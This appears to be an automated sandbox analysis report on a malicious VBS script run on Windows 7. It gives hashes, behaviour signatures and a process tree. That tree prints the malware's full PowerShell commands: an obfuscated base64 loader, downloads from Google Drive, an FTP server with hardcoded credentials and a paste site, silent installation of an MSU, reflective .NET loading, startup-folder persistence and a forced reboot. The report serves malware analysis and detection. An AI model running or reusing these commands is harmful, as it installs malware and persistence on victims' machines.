Overview

overview

10

Static

static

1

cee8a2a568...61.vbs

windows7-x64

10

cee8a2a568...61.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    10-07-2024 18:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs

  • Size

    703KB

  • MD5

    f1b75f0121271d4e6f174d28e3821244

  • SHA1

    4d3ece676f79050cfa65c539edf6c34b29d82038

  • SHA256

    cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761

  • SHA512

    3ae88843320ef8cc73b311c84fc0158a439e83bf08c612a6757cc2c1ae9ffd9d091400a3ac354abeff3f6274222ef995bf5d4a57f74d084790313105a24d6437

  • SSDEEP

    1536:oeeeeeeeeeeeeeeeeeeeeeee5WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWC:i

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops startup file 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$tEIHp = 'Ow℻_レ9ADsAKQAgACkAIAAnADEAZQ℻_レ1AHIAdAAnACAALAAgAHYATw℻_レhAFoARwAkACAALAAgACcAaA℻_レ0AHQAcA℻_レzADoALwAvAHMAaA℻_レhAHIAZQ℻_レ0AGUAeA℻_レ0AC4AbQ℻_レlAC8Acg℻_レhAHcALw℻_レvAGsAcw℻_レ2ADgAZA℻_レtAHUANA℻_レ2ACcAIAAoACAAXQ℻_レdAFsAdA℻_レjAGUAag℻_レiAG8AWwAgACwAIA℻_レsAGwAdQ℻_レuACQAIAAoAGUAaw℻_レvAHYAbg℻_レJAC4AKQAgACcASQ℻_レWAEYAcg℻_レwACcAIAAoAGQAbw℻_レoAHQAZQ℻_レNAHQAZQ℻_レHAC4AKQAnADEAcw℻_レzAGEAbA℻_レDAC4AMw℻_レ5AHIAYQ℻_レyAGIAaQ℻_レMAHMAcw℻_レhAGwAQwAnACgAZQ℻_レwAHkAVA℻_レ0AGUARwAuACkAIA℻_レ4AG0Aeg℻_レYAHgAJAAgACgAZA℻_レhAG8ATAAuAG4AaQ℻_レhAG0Abw℻_レEAHQAbg℻_レlAHIAcg℻_レ1AEMAOgA6AF0Abg℻_レpAGEAbQ℻_レvAEQAcA℻_レwAEEALg℻_レtAGUAdA℻_レzAHkAUw℻_レbADsAKQAgACkAIAAnAEEAJwAgACwAIAAnAJMhOgCTIScAIAAoAGUAYw℻_レhAGwAcA℻_レlAFIALg℻_レUAHQAQg℻_レCAFEAJAAgACgAZw℻_レuAGkAcg℻_レ0AFMANAA2AGUAcw℻_レhAEIAbQ℻_レvAHIARgA6ADoAXQ℻_レ0AHIAZQ℻_レ2AG4Abw℻_レDAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レ4AG0Aeg℻_レYAHgAJAAgAF0AXQ℻_レbAGUAdA℻_レ5AEIAWwA7ACcAJQ℻_レJAGgAcQ℻_レSAFgAJQAnACAAPQAgAHYATw℻_レhAFoARwAkADsAKQAgAFQAZA℻_レTAFUAWgAkACAAKA℻_レnAG4AaQ℻_レyAHQAUw℻_レkAGEAbw℻_レsAG4Adw℻_レvAEQALg℻_レUAHQAQg℻_レCAFEAJAAgAD0AIA℻_レUAHQAQg℻_レCAFEAJAA7ADgARg℻_レUAFUAOgA6AF0AZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AdA℻_レ4AGUAVAAuAG0AZQ℻_レ0AHMAeQ℻_レTAFsAIAA9ACAAZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AVA℻_レ0AEIAQg℻_レRACQAOwApAHQAbg℻_レlAGkAbA℻_レDAGIAZQ℻_レXAC4AdA℻_レlAE4AIA℻_レ0AGMAZQ℻_レqAGIATwAtAHcAZQ℻_レOACgAIAA9ACAAVA℻_レ0AEIAQg℻_レRACQAOwApACgAZQ℻_レzAG8AcA℻_レzAGkAZAAuAFQAdA℻_レCAEIAUQAkADsAKQAgACcAdA℻_レ4AHQALgAxADAATA℻_レMAEQALwAxADAALw℻_レyAGUAdA℻_レwAHkAcg℻_レjAHAAVQAvAHIAYgAuAG0Abw℻_レjAC4AdA℻_レhAHIAYg℻_レ2AGsAYw℻_レzAGUAZAAvAHIAYgAuAG0Abw℻_レjAC4AdA℻_レhAHIAYg℻_レ2AGsAYw℻_レzAGUAZAAuAHAAdA℻_レmAC8ALwA6AHAAdA℻_レmACcAIAAoAGcAbg℻_レpAHIAdA℻_レTAGQAYQ℻_レvAGwAbg℻_レ3AG8ARAAuAFQAdA℻_レCAEIAUQAkACAAPQAgAFQAZA℻_レTAFUAWgAkADsAKQAnACoAcA℻_レKADMANQA3ADkANQAxACcALAAnAHQAYQ℻_レyAGIAdg℻_レrAGMAcw℻_レlAGQAJwAoAGwAYQ℻_レpAHQAbg℻_レlAGQAZQ℻_レyAEMAaw℻_レyAG8Adw℻_レ0AGUATgAuAHQAZQ℻_レOAC4AbQ℻_レlAHQAcw℻_レ5AFMAIA℻_レ0AGMAZQ℻_レqAGIAbwAtAHcAZQ℻_レuACAAPQAgAHMAbA℻_レhAGkAdA℻_レuAGUAZA℻_レlAHIAQwAuAFQAdA℻_レCAEIAUQAkADsAOA℻_レGAFQAVQA6ADoAXQ℻_レnAG4AaQ℻_レkAG8AYw℻_レuAEUALg℻_レ0AHgAZQ℻_レUAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レnAG4AaQ℻_レkAG8AYw℻_レuAEUALg℻_レUAHQAQg℻_レCAFEAJAA7ACkAdA℻_レuAGUAaQ℻_レsAEMAYg℻_レlAFcALg℻_レ0AGUATgAgAHQAYw℻_レlAGoAYg℻_レPAC0Adw℻_レlAE4AKAAgAD0AIA℻_レUAHQAQg℻_レCAFEAJAA7AFQAZA℻_レTAFUAWgAkADsAMgAxAHMAbA℻_レUADoAOg℻_レdAGUAcA℻_レ5AFQAbA℻_レvAGMAbw℻_レ0AG8Acg℻_レQAHkAdA℻_レpAHIAdQ℻_レjAGUAUwAuAHQAZQ℻_レOAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レsAG8AYw℻_レvAHQAbw℻_レyAFAAeQ℻_レ0AGkAcg℻_レ1AGMAZQ℻_レTADoAOg℻_レdAHIAZQ℻_レnAGEAbg℻_レhAE0AdA℻_レuAGkAbw℻_レQAGUAYw℻_レpAHYAcg℻_レlAFMALg℻_レ0AGUATgAuAG0AZQ℻_レ0AHMAeQ℻_レTAFsAOw℻_レ9AGUAdQ℻_レyAHQAJA℻_レ7ACAAPQAgAGsAYw℻_レhAGIAbA℻_レsAGEAQw℻_レuAG8AaQ℻_レ0AGEAZA℻_レpAGwAYQ℻_レWAGUAdA℻_レhAGMAaQ℻_レmAGkAdA℻_レyAGUAQw℻_レyAGUAdg℻_レyAGUAUwA6ADoAXQ℻_レyAGUAZw℻_レhAG4AYQ℻_レNAHQAbg℻_レpAG8AUA℻_レlAGMAaQ℻_レ2AHIAZQ℻_レTAC4AdA℻_レlAE4ALg℻_レtAGUAdA℻_レzAHkAUw℻_レbAHsAIA℻_レlAHMAbA℻_レlAH0AIA℻_レmAC8AIAAwACAAdAAvACAAcgAvACAAZQ℻_レ4AGUALg℻_レuAHcAbw℻_レkAHQAdQ℻_レoAHMAIAA7ACcAMAA4ADEAIA℻_レwAGUAZQ℻_レsAHMAJwAgAGQAbg℻_レhAG0AbQ℻_レvAGMALQAgAGUAeA℻_レlAC4AbA℻_レsAGUAaA℻_レzAHIAZQ℻_レ3AG8AcAA7ACAAZQ℻_レjAHIAbw℻_レmAC0AIAApACAAJw℻_レwAHUAdA℻_レyAGEAdA℻_レTAFwAcw℻_レtAGEAcg℻_レnAG8Acg℻_レQAFwAdQ℻_レuAGUATQAgAHQAcg℻_レhAHQAUw℻_レcAHMAdw℻_レvAGQAbg℻_レpAFcAXA℻_レ0AGYAbw℻_レzAG8Acg℻_レjAGkATQ℻_レcAGcAbg℻_レpAG0AYQ℻_レvAFIAXA℻_レhAHQAYQ℻_レEAHAAcA℻_レ℻_レAFwAJwAgACsAIA℻_レwAHUAdA℻_レyAGEAdA℻_レTAGQAbA℻_レvAEYAJAAgACgAIA℻_レuAG8AaQ℻_レ0AGEAbg℻_レpAHQAcw℻_レlAEQALQAgACcAJQ℻_レJAGgAcQ℻_レSAFgAJQAnACAAbQ℻_レlAHQASQAtAHkAcA℻_レvAEMAIAA7ACAAdA℻_レyAGEAdA℻_レzAGUAcg℻_レvAG4ALwAgAHQAZQ℻_レpAHUAcQAvACAAZQ℻_レsAGkAZgAkACAAZQ℻_レ4AGUALg℻_レhAHMAdQ℻_レ3ACAAZQ℻_レ4AGUALg℻_レsAGwAZQ℻_レoAHMAcg℻_レlAHcAbw℻_レwACAAOwApACcAdQ℻_レzAG0ALg℻_レuAGkAdw℻_レwAFUAXAAnACAAKwAgAGEAdA℻_レzAGEAcAAkACgAIAA9ACAAZQ℻_レsAGkAZgAkADsAKQAgAGUAbQ℻_レhAE4Acg℻_レlAHMAVQA6ADoAXQ℻_レ0AG4AZQ℻_レtAG4Abw℻_レyAGkAdg℻_レuAEUAWwAgACsAIAAnAFwAcw℻_レyAGUAcw℻_レVAFwAOg℻_レDACcAKAAgAD0AIA℻_レwAHUAdA℻_レyAGEAdA℻_レTAGQAbA℻_レvAEYAJAA7ACkAJw℻_レ1AHMAbQAuAG4AaQ℻_レ3AHAAVQ℻_レcACcAIAArACAAYQ℻_レ0AHMAYQ℻_レwACQAIAAsAEIASw℻_レMAFIAVQAkACgAZQ℻_レsAGkARg℻_レkAGEAbw℻_レsAG4Adw℻_レvAEQALg℻_レhAGkAUg℻_レDAE8AJAA7ADgARg℻_レUAFUAOgA6AF0AZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AdA℻_レ4AGUAVAAuAG0AZQ℻_レ0AHMAeQ℻_レTAFsAIAA9ACAAZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AYQ℻_レpAFIAQw℻_レPACQAOwApAHQAbg℻_レlAGkAbA℻_レDAGIAZQ℻_レXAC4AdA℻_レlAE4AIA℻_レ0AGMAZQ℻_レqAGIATwAtAHcAZQ℻_レOACgAIAA9ACAAYQ℻_レpAFIAQw℻_レPACQAOw℻_レ9ADsAIAApACcAcg℻_レnADgARAA3AG8AUg℻_レzAGYAVg℻_レjAHIAMg℻_レuAEEAaA℻_レmAGgAVgA2AEQAQw℻_レ4AFIAcQ℻_レuAHEAagA1AGoAcg℻_レiADEAJwAgACsAIA℻_レCAEsATA℻_レSAFUAJAAoACAAPQAgAEIASw℻_レMAFIAVQAkAHsAIA℻_レlAHMAbA℻_レlAH0AOwAgACkAJw℻_レ4ADQAZg℻_レoAFoATQ℻_レ3AE4ANw℻_レVAGUAXwAwAF8ANQ℻_レfAGkAYw℻_レzAGIAaAA3AEMAUAAwAEkAZg℻_レQAGQAQQAyADEAMQAnACAAKwAgAEIASw℻_レMAFIAVQAkACgAIAA9ACAAQg℻_レLAEwAUg℻_レVACQAewAgACkAcg℻_レlAFYAbg℻_レpAFcAJAAoACAAZg℻_レpADsAIAApACcANAA2ACcAKA℻_レzAG4AaQ℻_レhAHQAbg℻_レvAEMALg℻_レFAFIAVQ℻_レUAEMARQ℻_レUAEkASA℻_レDAFIAQQ℻_レfAFIATw℻_レTAFMARQ℻_レDAE8AUg℻_レQADoAdg℻_レuAGUAJAAgAD0AIA℻_レyAGUAVg℻_レuAGkAVwAkADsAJwA9AGQAaQAmAGQAYQ℻_レvAGwAbg℻_レ3AG8AZAA9AHQAcg℻_レvAHAAeA℻_レlAD8AYw℻_レ1AC8AbQ℻_レvAGMALg℻_レlAGwAZw℻_レvAG8AZwAuAGUAdg℻_レpAHIAZAAvAC8AOg℻_レzAHAAdA℻_レ0AGgAJwAgAD0AIA℻_レCAEsATA℻_レSAFUAJAA7ACkAJw℻_レ1AHMAbQAuAG4AaQ℻_レ3AHAAVQ℻_レcACcAIAArACAAYQ℻_レ0AHMAYQ℻_レwACQAKAAgAGwAZQ℻_レkADsAKQAoAGgAdA℻_レhAFAAcA℻_レtAGUAVA℻_レ0AGUARwA6ADoAXQ℻_レoAHQAYQ℻_レQAC4ATw℻_レJAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レhAHQAcw℻_レhAHAAJA℻_レ7ACAAKQ℻_レyAGUAdw℻_レvAHAAcg℻_レlAFYAJAAoACAAZg℻_レpADsAIAApADIAKA℻_レzAGwAYQ℻_レ1AHEARQAuAHIAbw℻_レqAGEATQAuAG4Abw℻_レpAHMAcg℻_レlAFYALg℻_レ0AHMAbw℻_レoACQAIAA9ACAAcg℻_レlAHcAbw℻_レwAHIAZQ℻_レWACQAIAA7AA==';$mGvNv = $tEIHp.replace('℻_レ' , 'B') ;$xBEkr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $mGvNv ) ); $xBEkr = $xBEkr[-1..-$xBEkr.Length] -join '';$xBEkr = $xBEkr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs');powershell $xBEkr
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Verpower = $host.Version.Major.Equals(2) ;if ($Verpower) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$URLKB = 'https://drive.google.com/uc?export=download&id=';$WinVer = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($WinVer) {$URLKB = ($URLKB + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$URLKB = ($URLKB + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$OCRia = (New-Object Net.WebClient);$OCRia.Encoding = [System.Text.Encoding]::UTF8;$OCRia.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$ZUSdT;$QBBtT = (New-Object Net.WebClient);$QBBtT.Encoding = [System.Text.Encoding]::UTF8;$QBBtT.Credentials = new-object System.Net.NetworkCredential('desckvbrat','159753Jp*');$ZUSdT = $QBBtT.DownloadString( 'ftp://ftp.desckvbrat.com.br/desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$QBBtT.dispose();$QBBtT = (New-Object Net.WebClient);$QBBtT.Encoding = [System.Text.Encoding]::UTF8;$QBBtT = $QBBtT.DownloadString( $ZUSdT );$GZaOv = 'C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $QBBtT.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'v4umd8vsko/war/em.txeterahs//:sptth' , $GZaOv , 'true1' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1952
          • C:\Windows\system32\wusa.exe
            "C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
            5⤵
            • Drops file in Windows directory
            PID:1736
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2500

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    48a466f5faeb8a924cb8a7618e566f10

    SHA1

    4af17e6030a0a55d9aeb31172299d9189293b5dd

    SHA256

    083fd3cb1e2886dc1b05a43d7928fca1d7f30ec4e9242ec85769d40121486b77

    SHA512

    aa3890a4bfa505199e10bf057f86cf839ad37f050d0bdf367300f522366552d40d3347a6ff7b7cb079ff237d67968a68d533f971f28391030a0f45e9a3cd5fe0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    7143fb47a8d53311326f906d8ec4844a

    SHA1

    c856910635a5bbf6bf3c4800a98ec62bba3dc989

    SHA256

    8b5f60b3593816c64bde57f0414338a129c1a44c6dc8903245ab59ce6b35ffdd

    SHA512

    1ad4ef6335d776e9ea8cff8931cc0997d23cf4ef8ea3693d6f7a7aecc03e46d989deac0a0eef5093d33e46645888cefef48995c8b25c1ebbec9d97734bb0f6ad

    Download Submit

  • memory/2444-10-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-8-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-9-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-4-0x000007FEF505E000-0x000007FEF505F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2444-12-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-7-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-17-0x000007FEF4DA0000-0x000007FEF573D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2444-18-0x000007FEF505E000-0x000007FEF505F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2444-6-0x0000000002460000-0x0000000002468000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2444-5-0x000000001B290000-0x000000001B572000-memory.dmp

    Filesize

    2.9MB

    Download